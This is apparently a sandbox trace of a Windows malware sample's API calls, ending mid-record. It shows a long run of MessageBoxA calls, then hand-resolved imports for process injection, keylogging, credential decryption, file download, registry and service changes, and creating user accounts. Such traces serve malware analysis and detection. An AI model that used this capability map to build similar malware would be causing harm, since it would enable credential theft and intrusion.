(hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.873] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.874] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.875] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0290.876] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0295.472] GetNativeSystemInfo (in: lpSystemInfo=0x19fe64 | out: lpSystemInfo=0x19fe64*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0295.473] VirtualAlloc (lpAddress=0x0, dwSize=0x154000, flAllocationType=0x3000, flProtect=0x4) returned 0x29f0000 [0295.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x74130000 [0295.479] GetProcAddress (hModule=0x74130000, lpProcName="BCryptSetProperty") returned 0x741347e0 [0295.479] GetProcAddress (hModule=0x74130000, lpProcName="BCryptGenerateSymmetricKey") returned 0x74134910 [0295.479] GetProcAddress (hModule=0x74130000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x74133760 [0295.479] GetProcAddress (hModule=0x74130000, lpProcName="BCryptDecrypt") returned 0x74134ff0 [0295.479] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74c90000 [0295.479] GetProcAddress (hModule=0x74c90000, lpProcName="HeapFree") returned 0x74ca1ba0 [0295.479] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAlloc") returned 0x74ca7810 [0295.479] GetProcAddress (hModule=0x74c90000, lpProcName="HeapReAlloc") returned 0x7778efe0 [0295.479] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQuery") returned 0x74ca7a90 [0295.479] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateThread") returned 0x74cb0160 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="CreateThread") returned 0x74ca9b90 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="WriteProcessMemory") returned 0x74cd2850 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcess") returned 0x74ca38c0 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="OpenProcess") returned 0x74ca8bf0 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryA") returned 0x74cab060 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtectEx") returned 0x74cd2790 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAllocEx") returned 0x74cd2730 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="CreateRemoteThread") returned 0x74cd07f0 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="CreateProcessA") returned 0x74cd0750 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleW") returned 0x74ca9bc0 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0295.480] GetProcAddress (hModule=0x74c90000, lpProcName="WriteFile") returned 0x74cb6ca0 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileW") returned 0x74cb6890 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryW") returned 0x74caa840 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="GetLocalTime") returned 0x74ca9be0 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentThreadId") returned 0x74ca1b90 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcessId") returned 0x74ca23e0 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="ReadFile") returned 0x74cb6bb0 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileA") returned 0x74cb6920 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="GetBinaryTypeW") returned 0x74cd7820 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileA") returned 0x74cb6980 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="GetFullPathNameA") returned 0x74cb6ad0 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="GetTempPathW") returned 0x74cb6b30 [0295.481] GetProcAddress (hModule=0x74c90000, lpProcName="GetPrivateProfileStringW") returned 0x74cb09a0 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileA") returned 0x74cb6880 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="GlobalAlloc") returned 0x74ca9950 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentDirectoryW") returned 0x74caa9a0 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="SetCurrentDirectoryW") returned 0x74cafb20 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileSize") returned 0x74cb6a70 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="FreeLibrary") returned 0x74ca9f50 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="SetDllDirectoryW") returned 0x74cb5070 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileSizeEx") returned 0x74cb6a80 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryA") returned 0x74cb4bf0 [0295.482] GetProcAddress (hModule=0x74c90000, lpProcName="LocalFree") returned 0x74ca79a0 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObject") returned 0x74cb6820 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForMultipleObjects") returned 0x74cb6800 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="CreatePipe") returned 0x74ca0540 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="PeekNamedPipe") returned 0x74cd19b0 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="DuplicateHandle") returned 0x74cb6640 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="SetEvent") returned 0x74cb67d0 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="GetStartupInfoA") returned 0x74ca9c10 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="CreateEventA") returned 0x74cb6680 [0295.509] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameW") returned 0x74ca9b00 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="LoadResource") returned 0x74ca76f0 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="FindResourceW") returned 0x74cb2a40 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="GetComputerNameW") returned 0x74cb46a0 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="GlobalMemoryStatusEx") returned 0x74caafe0 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryExW") returned 0x74ca7930 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileW") returned 0x74cb6960 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileW") returned 0x74cb69a0 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="SetFilePointer") returned 0x74cb6c40 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="GetLogicalDriveStringsW") returned 0x74cb6af0 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteFileW") returned 0x74cb68c0 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="CopyFileW") returned 0x74cb6ec0 [0295.510] GetProcAddress (hModule=0x74c90000, lpProcName="GetDriveTypeW") returned 0x74cb6a10 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="EnterCriticalSection") returned 0x7779f290 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="LeaveCriticalSection") returned 0x7779f210 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeCriticalSection") returned 0x777ba200 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="DeleteCriticalSection") returned 0x777b0e60 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcessHeap") returned 0x74ca7710 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="ReleaseMutex") returned 0x74cb67a0 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateProcess") returned 0x74cb5100 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="CreateToolhelp32Snapshot") returned 0x74cb7b50 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="Process32NextW") returned 0x74cad290 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="Process32FirstW") returned 0x74caf5a0 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="SizeofResource") returned 0x74ca8f80 [0295.511] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtect") returned 0x74ca7a50 [0295.512] GetProcAddress (hModule=0x74c90000, lpProcName="GetSystemDirectoryW") returned 0x74ca9fd0 [0295.512] GetProcAddress (hModule=0x74c90000, lpProcName="LockResource") returned 0x74ca7890 [0295.512] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryW") returned 0x74cb5120 [0295.512] GetProcAddress (hModule=0x74c90000, lpProcName="Process32First") returned 0x74caf4d0 [0295.512] GetProcAddress (hModule=0x74c90000, lpProcName="Process32Next") returned 0x74cad1c0 [0295.515] GetProcAddress (hModule=0x74c90000, lpProcName="WinExec") returned 0x74ccff70 [0295.515] GetProcAddress (hModule=0x74c90000, lpProcName="GetTempPathA") returned 0x74cb6b20 [0295.515] GetProcAddress (hModule=0x74c90000, lpProcName="HeapAlloc") returned 0x77792bd0 [0295.515] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpW") returned 0x74ca7970 [0295.515] GetProcAddress (hModule=0x74c90000, lpProcName="GetTickCount") returned 0x74cb5eb0 [0295.519] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcpyW") returned 0x74ccd260 [0295.519] GetProcAddress (hModule=0x74c90000, lpProcName="WideCharToMultiByte") returned 0x74ca3880 [0295.519] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcpyA") returned 0x74caea30 [0295.519] GetProcAddress (hModule=0x74c90000, lpProcName="Sleep") returned 0x74ca7990 [0295.519] GetProcAddress (hModule=0x74c90000, lpProcName="MultiByteToWideChar") returned 0x74ca2ad0 [0295.522] GetProcAddress (hModule=0x74c90000, lpProcName="GetCommandLineA") returned 0x74caab60 [0295.522] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleA") returned 0x74ca99f0 [0295.522] GetProcAddress (hModule=0x74c90000, lpProcName="ExitProcess") returned 0x74cb7b30 [0295.522] GetProcAddress (hModule=0x74c90000, lpProcName="CreateProcessW") returned 0x74cab000 [0295.522] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcatA") returned 0x74caf640 [0295.524] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcmpA") returned 0x74cacc30 [0295.524] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenA") returned 0x74ca8c80 [0295.524] GetProcAddress (hModule=0x74c90000, lpProcName="ExpandEnvironmentStringsW") returned 0x74cacd50 [0295.524] GetProcAddress (hModule=0x74c90000, lpProcName="lstrlenW") returned 0x74ca3690 [0295.525] GetProcAddress (hModule=0x74c90000, lpProcName="CloseHandle") returned 0x74cb6630 [0295.525] GetProcAddress (hModule=0x74c90000, lpProcName="lstrcatW") returned 0x74ccd170 [0295.527] GetProcAddress (hModule=0x74c90000, lpProcName="GetLastError") returned 0x74ca3870 [0295.527] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualFree") returned 0x74ca7600 [0295.527] GetProcAddress (hModule=0x74c90000, lpProcName="GetProcAddress") returned 0x74ca78b0 [0295.527] GetProcAddress (hModule=0x74c90000, lpProcName="SetLastError") returned 0x74ca2af0 [0295.527] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleFileNameA") returned 0x74caa720 [0295.527] GetProcAddress (hModule=0x74c90000, lpProcName="CreateDirectoryW") returned 0x74cb6860 [0295.527] GetProcAddress (hModule=0x74c90000, lpProcName="LocalAlloc") returned 0x74ca7a30 [0295.528] GetProcAddress (hModule=0x74c90000, lpProcName="CreateMutexA") returned 0x74cb66c0 [0295.528] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x756d0000 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="GetKeyState") returned 0x756eddd0 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="GetMessageA") returned 0x756fe130 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="DispatchMessageA") returned 0x75706f10 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowExW") returned 0x756e9860 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="CallNextHookEx") returned 0x756e3550 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="GetAsyncKeyState") returned 0x756ee820 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterClassW") returned 0x756e9800 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="GetRawInputData") returned 0x7570c3f0 [0295.528] GetProcAddress (hModule=0x756d0000, lpProcName="MapVirtualKeyA") returned 0x75703e20 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="DefWindowProcA") returned 0x777eaed0 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterRawInputDevices") returned 0x7570c950 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="TranslateMessage") returned 0x756ed9b0 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="GetForegroundWindow") returned 0x75708cb0 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="GetKeyNameTextW") returned 0x75738f40 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="PostQuitMessage") returned 0x757072f0 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="GetLastInputInfo") returned 0x756fe100 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="wsprintfW") returned 0x756ff890 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="GetWindowTextW") returned 0x756fcb20 [0295.529] GetProcAddress (hModule=0x756d0000, lpProcName="wsprintfA") returned 0x757004a0 [0295.530] GetProcAddress (hModule=0x756d0000, lpProcName="ToUnicode") returned 0x757047d0 [0295.530] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75830000 [0295.531] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyW") returned 0x758504f0 [0295.531] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExW") returned 0x7584fa20 [0295.531] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExA") returned 0x75850a20 [0295.531] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteValueW") returned 0x75850fb0 [0295.531] GetProcAddress (hModule=0x75830000, lpProcName="LookupPrivilegeValueW") returned 0x7584e430 [0295.531] GetProcAddress (hModule=0x75830000, lpProcName="AdjustTokenPrivileges") returned 0x75850980 [0295.532] GetProcAddress (hModule=0x75830000, lpProcName="AllocateAndInitializeSid") returned 0x7584f660 [0295.532] GetProcAddress (hModule=0x75830000, lpProcName="OpenProcessToken") returned 0x7584f520 [0295.532] GetProcAddress (hModule=0x75830000, lpProcName="InitializeSecurityDescriptor") returned 0x7584fc00 [0295.532] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyA") returned 0x758504a0 [0295.533] GetProcAddress (hModule=0x75830000, lpProcName="SetSecurityDescriptorDacl") returned 0x7584f830 [0295.533] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExW") returned 0x7584f350 [0295.533] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExA") returned 0x7584f790 [0295.533] GetProcAddress (hModule=0x75830000, lpProcName="RegEnumKeyExW") returned 0x7584f470 [0295.533] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExA") returned 0x7584f500 [0295.533] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryInfoKeyW") returned 0x7584f640 [0295.533] GetProcAddress (hModule=0x75830000, lpProcName="RegCloseKey") returned 0x7584f620 [0295.533] GetProcAddress (hModule=0x75830000, lpProcName="OpenServiceW") returned 0x75850690 [0295.534] GetProcAddress (hModule=0x75830000, lpProcName="ChangeServiceConfigW") returned 0x758664b0 [0295.534] GetProcAddress (hModule=0x75830000, lpProcName="QueryServiceConfigW") returned 0x758505b0 [0295.534] GetProcAddress (hModule=0x75830000, lpProcName="EnumServicesStatusExW") returned 0x75850610 [0295.534] GetProcAddress (hModule=0x75830000, lpProcName="StartServiceW") returned 0x75854210 [0295.534] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExW") returned 0x7584f7f0 [0295.534] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExA") returned 0x7584fa60 [0295.535] GetProcAddress (hModule=0x75830000, lpProcName="OpenSCManagerW") returned 0x75850ed0 [0295.535] GetProcAddress (hModule=0x75830000, lpProcName="CloseServiceHandle") returned 0x75850960 [0295.535] GetProcAddress (hModule=0x75830000, lpProcName="GetTokenInformation") returned 0x7584f370 [0295.536] GetProcAddress (hModule=0x75830000, lpProcName="LookupAccountSidW") returned 0x7584f590 [0295.536] GetProcAddress (hModule=0x75830000, lpProcName="FreeSid") returned 0x75850440 [0295.536] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExW") returned 0x7584f330 [0295.536] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c70000 [0295.536] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteExA") returned 0x75ee0290 [0295.536] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteExW") returned 0x75e0e690 [0295.536] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetSpecialFolderPathW") returned 0x75e1f9c0 [0295.536] GetProcAddress (hModule=0x75c70000, lpProcName="SHCreateDirectoryExW") returned 0x75e20490 [0295.536] GetProcAddress (hModule=0x75c70000, lpProcName="ShellExecuteW") returned 0x75e0d9f0 [0295.536] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFolderPathW") returned 0x75e14e80 [0295.537] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetKnownFolderPath") returned 0x75e19710 [0295.537] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x702c0000 [0295.591] GetProcAddress (hModule=0x702c0000, lpProcName="URLDownloadToFileW") returned 0x7033b240 [0295.591] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75520000 [0295.609] GetProcAddress (hModule=0x75520000, lpProcName="InetNtopW") returned 0x7554bd80 [0295.609] GetProcAddress (hModule=0x75520000, lpProcName="getaddrinfo") returned 0x755355c0 [0295.609] GetProcAddress (hModule=0x75520000, lpProcName="freeaddrinfo") returned 0x75535ee0 [0295.609] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77660000 [0295.609] GetProcAddress (hModule=0x77660000, lpProcName="CoInitializeSecurity") returned 0x77543870 [0295.609] GetProcAddress (hModule=0x77660000, lpProcName="CoCreateInstance") returned 0x77500060 [0295.609] GetProcAddress (hModule=0x77660000, lpProcName="CoInitialize") returned 0x77691930 [0295.610] GetProcAddress (hModule=0x77660000, lpProcName="CoUninitialize") returned 0x774d92a0 [0295.610] GetProcAddress (hModule=0x77660000, lpProcName="CoTaskMemFree") returned 0x774d9170 [0295.610] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x74860000 [0295.610] GetProcAddress (hModule=0x74860000, lpProcName="StrStrW") returned 0x74878540 [0295.610] GetProcAddress (hModule=0x74860000, lpProcName="PathRemoveFileSpecA") returned 0x74882d80 [0295.610] GetProcAddress (hModule=0x74860000, lpProcName="StrStrA") returned 0x74883570 [0295.610] GetProcAddress (hModule=0x74860000, lpProcName="PathCombineA") returned 0x748828e0 [0295.610] GetProcAddress (hModule=0x74860000, lpProcName="PathFindFileNameW") returned 0x74877a50 [0295.610] GetProcAddress (hModule=0x74860000, lpProcName="PathFileExistsW") returned 0x74878670 [0295.610] GetProcAddress (hModule=0x74860000, lpProcName="PathFindExtensionW") returned 0x74877960 [0295.610] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x77640000 [0295.612] GetProcAddress (hModule=0x77640000, lpProcName="NetLocalGroupAddMembers") returned 0x702a82b0 [0295.616] GetProcAddress (hModule=0x77640000, lpProcName="NetUserAdd") returned 0x702aba50 [0295.616] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x755e0000 [0295.617] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x74690000 [0295.621] GetProcAddress (hModule=0x74690000, lpProcName="CryptUnprotectData") returned 0x746b3140 [0295.621] GetProcAddress (hModule=0x74690000, lpProcName="CryptStringToBinaryA") returned 0x746ad6d0 [0295.621] GetProcAddress (hModule=0x74690000, lpProcName="CryptStringToBinaryW") returned 0x746ad5a0 [0295.621] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75820000 [0295.623] GetProcAddress (hModule=0x75820000, lpProcName="GetModuleFileNameExW") returned 0x758213e0 [0295.623] VirtualProtect (in: lpAddress=0x29f1000, dwSize=0x13000, flNewProtect=0x20, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0295.645] VirtualProtect (in: 